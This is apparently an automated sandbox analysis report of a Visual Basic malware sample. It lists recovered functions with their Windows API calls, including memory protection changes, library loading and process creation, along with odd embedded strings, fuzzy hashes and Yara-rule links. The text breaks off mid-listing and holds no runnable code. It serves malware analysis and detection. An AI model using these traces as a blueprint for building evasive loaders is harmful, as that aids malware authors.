Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 5ab16e501c9ede7424887168d9bcdd6cc7ae383dbc2a4071dd1c9ca958e39bec
Instruction ID: a462b2cd2f7e7de747a6649927199ec985479ba3a3abd06ce4cdb99c92403998
Opcode Fuzzy Hash: 5ab16e501c9ede7424887168d9bcdd6cc7ae383dbc2a4071dd1c9ca958e39bec
Instruction Fuzzy Hash: 7D017032144B419EDF235FA8E64035E37996F03B44F798355E8D15E1C9CBF99015C215

Uniqueness

Uniqueness Score: -1.00%

Function 003D0A63, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

EnumWindows.USER32(003D0AF9,?,00000000,000000BB,003DA5E4,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D0A9E

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 4711120c8e9b8117b12506b5be0de29318e59335c2b84f1a87bc7724eca7696c
Instruction ID: e28d27ac221670d3c31be65236cbde2b072bc532a35b159a0d61c7b42a7d8ccf
Opcode Fuzzy Hash: 4711120c8e9b8117b12506b5be0de29318e59335c2b84f1a87bc7724eca7696c
Instruction Fuzzy Hash: 4AF0F936288F119DEB152EF4D98079D23DADF47B50F64461AE8E5C95C4DB358045C601

Uniqueness

Uniqueness Score: -1.00%

Function 003D6DDF, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6207f8d5bf116dcda84183acdad00089221a49e1ea5c2a4480c4dea663f7e357
Instruction ID: c615b8f49e5a628ef0ecd2d23154d24337045dc9a3e56228356f7597efce71c3
Opcode Fuzzy Hash: 6207f8d5bf116dcda84183acdad00089221a49e1ea5c2a4480c4dea663f7e357
Instruction Fuzzy Hash: DEF0286F584B15DECF223FA4F642BAD239C8F02B40FA04623BCF0D8649DB7880468746

Uniqueness

Uniqueness Score: -1.00%

Function 003DA3D3, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,?,?,?,000000C0,?,?,-00000001,?,003D04F7,00000000), ref: 003DA426

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 8ae0d7d1e1210f48b37868fc315177b48640e4c4bf464ee890b1c0a40b5322af
Instruction ID: 51f56e6b36a729eb30f47019c00135e934babeb4ada1bfc1f424cb42d01b4d91
Opcode Fuzzy Hash: 8ae0d7d1e1210f48b37868fc315177b48640e4c4bf464ee890b1c0a40b5322af
Instruction Fuzzy Hash: 25F02D17144F128CDB271FA6F34835D327A9F13B40BD985459CC199E48EB798405C302

Uniqueness

Uniqueness Score: -1.00%

Function 003D15D7, Relevance: 1.5, APIs: 1, Instructions: 39libraryCOMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B
LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: 0b94f59e793d1ecb0a32b889bd4c0dcaaa3c70ff5ba80942201dbd6d73519271
Instruction ID: 967b532dab8076cc7570d013af6acfc1da9dcf7c54304a29a3b32dd2e0466955
Opcode Fuzzy Hash: 0b94f59e793d1ecb0a32b889bd4c0dcaaa3c70ff5ba80942201dbd6d73519271
Instruction Fuzzy Hash: D3F02216198F525CEB230BE9B20434E2AC92F03B80FA8828598D59D5CDDFB8901A8106

Uniqueness

Uniqueness Score: -1.00%

Function 003D6E25, Relevance: 1.5, APIs: 1, Instructions: 38libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d8e4a8d1fc122e82b830821c9ade88962d03b3614fa942dcb588d25a3cc89d9d
Instruction ID: ce143f6959b758c0195846668470a205349c6b1a5d398239af118fc3faab7c49
Opcode Fuzzy Hash: d8e4a8d1fc122e82b830821c9ade88962d03b3614fa942dcb588d25a3cc89d9d
Instruction Fuzzy Hash: A8F0B45F598A219ADF222FE1F64279D129D4F02B80FA44513BCF4DC588DF28C0568646

Uniqueness

Uniqueness Score: -1.00%

Function 003D6EDF, Relevance: 1.5, APIs: 1, Instructions: 37libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5ce6bf67c1bdd49c1ccb3e0ccf272f1942cf60834a44e427e572a637bd50b00c
Instruction ID: f357d966b190c835083c982cfb3a0ad9016ad4a3413ae176601ef0028da816d8
Opcode Fuzzy Hash: 5ce6bf67c1bdd49c1ccb3e0ccf272f1942cf60834a44e427e572a637bd50b00c
Instruction Fuzzy Hash: 28F0902B5D0F214CDF212FEAE24438D26D99E07E80B98475069E4DC48CEF78D016CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 003D6DC7, Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7eaa76c0c2f11f05c897d1fbdf37047347d900d75959b5dc2acb8547664fda8a
Instruction ID: e4872feadb5a2079b55597d92a88a3ba2a07bffcd91fd4e6ccb55532e4f7b671
Opcode Fuzzy Hash: 7eaa76c0c2f11f05c897d1fbdf37047347d900d75959b5dc2acb8547664fda8a
Instruction Fuzzy Hash: 78F0E25B548504E6CF237F64FD53BBD131C4B00354F604937B8B699742C724C4849783

Uniqueness

Uniqueness Score: -1.00%

Function 003D6E5F, Relevance: 1.5, APIs: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4549582b1031df3557941a4f7520b6e1010067226113c74a75b12f993382d701
Instruction ID: d2c34432677730b956b13ccb2c3529a519ff2deb3608680b9f623cf68d1a4ee2
Opcode Fuzzy Hash: 4549582b1031df3557941a4f7520b6e1010067226113c74a75b12f993382d701
Instruction Fuzzy Hash: E3F0825B594E218ACF223FE5F14538D169D9A06F40BE486137CF4DC589EF78C0168B46

Uniqueness

Uniqueness Score: -1.00%

Function 003D6E9F, Relevance: 1.5, APIs: 1, Instructions: 30libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 227f19657b698463172f2813b6856cb1a32c8b29d31f5d91332ddc7b85ac5ca8
Instruction ID: 3c38f29790ceae14808d205468254b97ee512a7e2786b8cb38b7847e79964fad
Opcode Fuzzy Hash: 227f19657b698463172f2813b6856cb1a32c8b29d31f5d91332ddc7b85ac5ca8
Instruction Fuzzy Hash: 69F0A72A194F218ECF223FE9F14178C27A89B02F40B948622B8F4CC58DDB789012CB46

Uniqueness

Uniqueness Score: -1.00%

Function 003D162C, Relevance: 1.5, APIs: 1, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 003D440B
LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: cf2cef2759f590ac6dba7ce377225a36b7afa48191995a6de011934deb354cc8
Instruction ID: b9fa93cbce1153c2503f14dffafc6e1ef049935380c76c36e054a0d26c313b3e
Opcode Fuzzy Hash: cf2cef2759f590ac6dba7ce377225a36b7afa48191995a6de011934deb354cc8
Instruction Fuzzy Hash: 13E092761D4B268DDF321FE9A20034D279A9B03E50FA5076094A5AC0C8EFB4801AC24A

Uniqueness

Uniqueness Score: -1.00%

Function 003D4A20, Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,003D497C,003D4A7D,003D0CC7,?,?,?,?,?,000000C0), ref: 003D4A5D

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: bdd6c79a8f2bc19b4450c1005397142b959b60c774b670b4e01ca7ed20c4c8b1
Instruction ID: d632e12828c98f742c6d9001d3c627f4b5491bb05ee5e00f3d8867d2bdc30d0d
Opcode Fuzzy Hash: bdd6c79a8f2bc19b4450c1005397142b959b60c774b670b4e01ca7ed20c4c8b1
Instruction Fuzzy Hash: 36E08C6A9E0F128CEA241EE2E3097CF128A4F13EC0F9842006EC8DC088BF688026C509

Uniqueness

Uniqueness Score: -1.00%

Function 003D4A0E, Relevance: 1.5, APIs: 1, Instructions: 17fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,003D497C,003D4A7D,003D0CC7,?,?,?,?,?,000000C0), ref: 003D4A5D

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: bef5c83e52e613ab61bc299e222d151747a85b2ce628e27e2b2488f39355c5f1
Instruction ID: db88f209b5d7d843e173f8036b59a7088f7df76c3ac1ad66d17f872b8d030260
Opcode Fuzzy Hash: bef5c83e52e613ab61bc299e222d151747a85b2ce628e27e2b2488f39355c5f1
Instruction Fuzzy Hash: A9D0C9717D8305FAF6204560BE2BFDA62495B82B50F01410ABF4E2A1C267E20654D616

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 003D7F4B, Relevance: 1.3, Strings: 1, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Strings

~, xrefs: 003D7F5C

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: ~
API String ID: 1029625771-1707062198
Opcode ID: 8068b7ece3353b8096c50b7cb3775e46979ccfd5cb938a651153d7ae81af488b
Instruction ID: 98f682603c38bdc262b319422ca4e0288a432f5606593cca432f70978f24ead1
Opcode Fuzzy Hash: 8068b7ece3353b8096c50b7cb3775e46979ccfd5cb938a651153d7ae81af488b
Instruction Fuzzy Hash: 9101D17721C200DFD327DB14F18AF6A73A9AB6A720F214447F4474BB56EE20BC4AD605

Uniqueness

Uniqueness Score: -1.00%

Function 003D90B7, Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 57f2710b57c9a65ee054ff2572103d36e40ac99bffae78bfec702f374296c476
Instruction ID: b1f862a8bce9644dfd93389a36a4b5ed6c1c6b153877e664cee976349d6e77d3
Opcode Fuzzy Hash: 57f2710b57c9a65ee054ff2572103d36e40ac99bffae78bfec702f374296c476
Instruction Fuzzy Hash: 6D51E576508742CECB27CF68E4D47647B95AF16320F2982ABD8968F7D6D374C842CB12

Uniqueness

Uniqueness Score: -1.00%

Function 003D90F7, Relevance: .2, Instructions: 177libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 003D9A29: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,003D92BD,00000040,003D0BE7,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 003D9A42

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: ca6f5367a1e16813b26be0bdb2033d3a7665d3713942acb979a5fc52bc7d92bb
Instruction ID: 8c00f5448e8d125a299a838c1da2b77f7c57fdb31b39f4792b61ccadcfd306d7
Opcode Fuzzy Hash: ca6f5367a1e16813b26be0bdb2033d3a7665d3713942acb979a5fc52bc7d92bb
Instruction Fuzzy Hash: 6751E676508341CECB27CF68E4D4B547BA5AF16320F2982ABD9968F7D6D374C842CB12

Uniqueness

Uniqueness Score: -1.00%

Function 003D90AB, Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: fa6e8998efea318d6e53e8b91907dd90dac1003732e86e5a977852d2ba754320
Instruction ID: 15dc34493a2746a621b6c84a64b8499b9e892e4cf2a6ac89d33a391b7a7afcfe
Opcode Fuzzy Hash: fa6e8998efea318d6e53e8b91907dd90dac1003732e86e5a977852d2ba754320
Instruction Fuzzy Hash: 4B51C772508345CFCB27CF28E4D4B647B95AF56320F2582ABD8968F7D6D3748842DB12

Uniqueness

Uniqueness Score: -1.00%

Function 003D9137, Relevance: .2, Instructions: 172libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 003D9A29: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,003D92BD,00000040,003D0BE7,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 003D9A42

LoadLibraryA.KERNEL32(00008AE8,?,?,003D8AA7,F21FD920,003DA01E,?,?,?,?,?,000000C0,?,?,-00000001), ref: 003D6F3F

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: fd2711fa196ff1d2d59a40ca15883e672ddd3d8389b25d9f206d0427326c285c
Instruction ID: 8744cb1db5c4834a5aa0b0f9d29689cb596d843e2489632f79a7f7121122e0aa
Opcode Fuzzy Hash: fd2711fa196ff1d2d59a40ca15883e672ddd3d8389b25d9f206d0427326c285c
Instruction Fuzzy Hash: DD51F576508741CECB27CF28E4D4B547BA5AF16320F2982ABD8968F7D6D374C842CB12

Uniqueness

Uniqueness Score: -1.00%

Function 003D2E3F, Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7030164eea29dc4715451e346a95f646417a1bb04f1e57a06a5bcb0ec413bb6f
Instruction ID: 77e99e150b03c0031445e19e1d84e0cd09371038de9c409314c54ff3e99042a4
Opcode Fuzzy Hash: 7030164eea29dc4715451e346a95f646417a1bb04f1e57a06a5bcb0ec413bb6f
Instruction Fuzzy Hash: AA3158732402029FCB56AF28EC51BEA73E8BF01710F65422AFC9AC7740DB209C488741

Uniqueness

Uniqueness Score: -1.00%

Function 003D3168, Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc69685c296c14ef97c4838d9f7e7daebcf6c67b81451b92b909a8f23b1fb1de
Instruction ID: 6080d3f8a35fe63d8ea2673376f5216f11496a4d452086c512b22fb6e24e3ad5
Opcode Fuzzy Hash: cc69685c296c14ef97c4838d9f7e7daebcf6c67b81451b92b909a8f23b1fb1de
Instruction Fuzzy Hash: 1F3159366843009FEB225F64FD88BA837E8BF03750F258667ED429E6D5DB74C905C606

Uniqueness

Uniqueness Score: -1.00%

Function 003D31AF, Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7ba1076bf3a685918036063dce26e0a3838ccc20a770f9bd83dfb37748d0fe9
Instruction ID: d6fa3b0829eaa8af8abe9dec1126d9c25ff762f53142604e2464d9b43f72ce7c
Opcode Fuzzy Hash: c7ba1076bf3a685918036063dce26e0a3838ccc20a770f9bd83dfb37748d0fe9
Instruction Fuzzy Hash: 97214736684301DFEB325F64FD88BA832A4AF02B10F218267FD429E2D5DB70C944C906

Uniqueness

Uniqueness Score: -1.00%

Function 003D4443, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Function 003D6C83, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2190663659.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 010099d8a19dbcaef391a3c42f17448eca6c97cc16c689b1492362b2fa612e06
Instruction ID: 320ed73f473c4448dc1d8056a81b791f7ea8c0ac77f3605e2095c5222531036e
Opcode Fuzzy Hash: 010099d8a19dbcaef391a3c42f17448eca6c97cc16c689b1492362b2fa612e06
Instruction Fuzzy Hash: 2EB09275226A40CFC656CE09C0C0E0073B4F708B00F1208A1F411CBF11C324E804AA00

Uniqueness

Uniqueness Score: -1.00%

Function 00425770, Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

__vbaAryConstruct2.MSVBVM60(?,004112F0,00000008), ref: 004257C7
#582.MSVBVM60(00000000,00000000), ref: 004257CF
__vbaFpR8.MSVBVM60 ref: 004257D5
#704.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 00425802
__vbaStrMove.MSVBVM60 ref: 0042580D
__vbaFreeVar.MSVBVM60 ref: 00425816
__vbaNew2.MSVBVM60(0040E098, ~-), ref: 0042582F
__vbaObjSet.MSVBVM60(?,00000000), ref: 00425848
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410240,000001DC), ref: 0042586F
__vbaStrCopy.MSVBVM60 ref: 00425881
__vbaFreeStr.MSVBVM60 ref: 00425886
__vbaFreeObj.MSVBVM60 ref: 00425895
__vbaStrCopy.MSVBVM60 ref: 004258A2
__vbaNew2.MSVBVM60(0040E098, ~-), ref: 004258B7
__vbaObjSet.MSVBVM60(?,00000000), ref: 004258D0
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410240,00000048), ref: 004258F1
__vbaStrCopy.MSVBVM60 ref: 00425900
__vbaFreeStr.MSVBVM60 ref: 00425905
__vbaFreeObj.MSVBVM60 ref: 0042590E
__vbaNew2.MSVBVM60(0040E098, ~-), ref: 00425923
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042593C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410240,00000048), ref: 0042595D
__vbaStrCopy.MSVBVM60 ref: 0042596C
__vbaFreeStr.MSVBVM60 ref: 00425971
__vbaFreeObj.MSVBVM60 ref: 0042597A
__vbaStrCopy.MSVBVM60 ref: 00425987
__vbaNew2.MSVBVM60(004101D0,004273B8), ref: 0042599C
__vbaHresultCheckObj.MSVBVM60(00000000,0264E7AC,004101C0,0000001C), ref: 004259C1
__vbaNew2.MSVBVM60(0040E098, ~-), ref: 004259E2
__vbaObjSet.MSVBVM60(?,00000000), ref: 004259FB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410284,00000150), ref: 00425A22
__vbaHresultCheckObj.MSVBVM60(00000000,?,004103F8,00000060), ref: 00425A5C
__vbaFreeStr.MSVBVM60 ref: 00425A65
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00425A75
__vbaAryDestruct.MSVBVM60(00000000,?,00425AC8), ref: 00425AB8
__vbaFreeStr.MSVBVM60 ref: 00425AC1

Strings

NULLOS, xrefs: 0042589A
~-, xrefs: 0042581C, 00425825, 00425835, 004258A4, 004258AD, 004258BD, 00425910, 00425919, 00425929, 004259C7, 004259D8, 004259E8
SPIDSNINGERNES, xrefs: 0042597F

Memory Dump Source

Source File: 00000005.00000002.2190815212.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2190769777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2190942890.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.2190988941.0000000000428000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$CopyNew2$#582#704Construct2DestructListMove
String ID: ~-$NULLOS$SPIDSNINGERNES
API String ID: 177561990-1647473520
Opcode ID: 9e283a684fb812f8cc0e573e6ee1bf3f557c083b92c3d781672fec2b4abd9372
Instruction ID: 97c1672dc03d59ecc29f3770ef37359c91aa1070f13ec1e557748f980f67405e
Opcode Fuzzy Hash: 9e283a684fb812f8cc0e573e6ee1bf3f557c083b92c3d781672fec2b4abd9372
Instruction Fuzzy Hash: 9BA17070A00219AFCB14DFA4ED88E9EBBB8FF48711F108529F545F72A0DB74A845CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00425AF0, Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 152COMMON

Download Yara Rule

APIs

#646.MSVBVM60(?), ref: 00425B54
__vbaStrMove.MSVBVM60 ref: 00425B65
__vbaStrCmp.MSVBVM60(TINGSRETTENS,00000000), ref: 00425B6D
__vbaFreeStr.MSVBVM60 ref: 00425B7F
__vbaFreeVar.MSVBVM60 ref: 00425B88
#611.MSVBVM60 ref: 00425B97
__vbaStrMove.MSVBVM60 ref: 00425BA2
#690.MSVBVM60(Ejektoren,Haabedes,Ddsofrene9,EPICOELAR), ref: 00425BB8
__vbaNew2.MSVBVM60(004101D0,004273B8), ref: 00425BD0
__vbaHresultCheckObj.MSVBVM60(00000000,0264E7AC,004101C0,0000004C), ref: 00425BF5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410334,0000001C), ref: 00425C3D
__vbaObjSet.MSVBVM60(?,?), ref: 00425C4E
__vbaFreeObj.MSVBVM60 ref: 00425C57
__vbaNew2.MSVBVM60(0040E098, ~-), ref: 00425C70
__vbaObjSet.MSVBVM60(?,00000000), ref: 00425C89
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410240,000001A0), ref: 00425CB0
__vbaFreeObj.MSVBVM60 ref: 00425CBF
__vbaFreeStr.MSVBVM60(00425D05), ref: 00425CF5
__vbaFreeObj.MSVBVM60 ref: 00425CFE

Strings

Ddsofrene9, xrefs: 00425BA9
Haabedes, xrefs: 00425BAE
TINGSRETTENS, xrefs: 00425B68
Ejektoren, xrefs: 00425BB3
EPICOELAR, xrefs: 00425BA4
~-, xrefs: 00425C5D, 00425C66, 00425C76

Memory Dump Source

Source File: 00000005.00000002.2190815212.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2190769777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2190942890.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.2190988941.0000000000428000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$#611#646#690
String ID: ~-$Ddsofrene9$EPICOELAR$Ejektoren$Haabedes$TINGSRETTENS
API String ID: 1609991423-456527953
Opcode ID: 22c12689c55b5a085f45d0e3ab8d319194904ff1b8e2267b5fdddc66da1c64b6
Instruction ID: c7fbd89597e613ffd07d4f1c8a0be71ba7b7a713897fb3496bce3baa551ecf6e
Opcode Fuzzy Hash: 22c12689c55b5a085f45d0e3ab8d319194904ff1b8e2267b5fdddc66da1c64b6
Instruction Fuzzy Hash: B1515D70E40218AFCB14DFA5D989ADEBBB8FF58700F10842AF941B7264D7785945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00423800, Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 92COMMON

Download Yara Rule

APIs

__vbaStrCmp.MSVBVM60(00411258,00411258), ref: 00423844
__vbaNew2.MSVBVM60(0040E098, ~-), ref: 00423865
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042387E
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410274,00000048), ref: 0042389F
#690.MSVBVM60(Playfully9,Nonnasally5,BORDEAUXS,?), ref: 004238B8
__vbaFreeStr.MSVBVM60 ref: 004238C1
__vbaFreeObj.MSVBVM60 ref: 004238CA
#613.MSVBVM60(?,?), ref: 004238E3
__vbaStrVarMove.MSVBVM60(?), ref: 004238ED
__vbaStrMove.MSVBVM60 ref: 004238F8
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00423907
#571.MSVBVM60(00000077), ref: 00423912
__vbaFreeStr.MSVBVM60(00423957), ref: 00423950

Strings

Nonnasally5, xrefs: 004238AE
~-, xrefs: 00423852, 0042385B, 0042386B
Playfully9, xrefs: 004238B3
BORDEAUXS, xrefs: 004238A9

Memory Dump Source

Source File: 00000005.00000002.2190815212.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2190769777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2190942890.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.2190988941.0000000000428000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#571#613#690CheckHresultListNew2
String ID: ~-$BORDEAUXS$Nonnasally5$Playfully9
API String ID: 164356923-1682962004
Opcode ID: 2cf9fa40acc0b0800fdafb67f5dec0cb32e26847bb0ad6d87b575bf7409ed2db
Instruction ID: ce9324e2bbb956bccee738a4ac56e27d0531a4f4a787a9d27c6aea7e169ffbd3
Opcode Fuzzy Hash: 2cf9fa40acc0b0800fdafb67f5dec0cb32e26847bb0ad6d87b575bf7409ed2db
Instruction Fuzzy Hash: 203162B1940219EBCB00DFA4DE49EDEBBB8FF58701F204126F541B3160DB785A45CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00425EA0, Relevance: 16.6, APIs: 11, Instructions: 88COMMON

Download Yara Rule

APIs

#525.MSVBVM60(00000001), ref: 00425ED9
__vbaStrMove.MSVBVM60 ref: 00425EE4
__vbaStrCmp.MSVBVM60(00411378,00000000), ref: 00425EF0
__vbaFreeStr.MSVBVM60 ref: 00425F03
#535.MSVBVM60 ref: 00425F12
#593.MSVBVM60(?), ref: 00425F2C
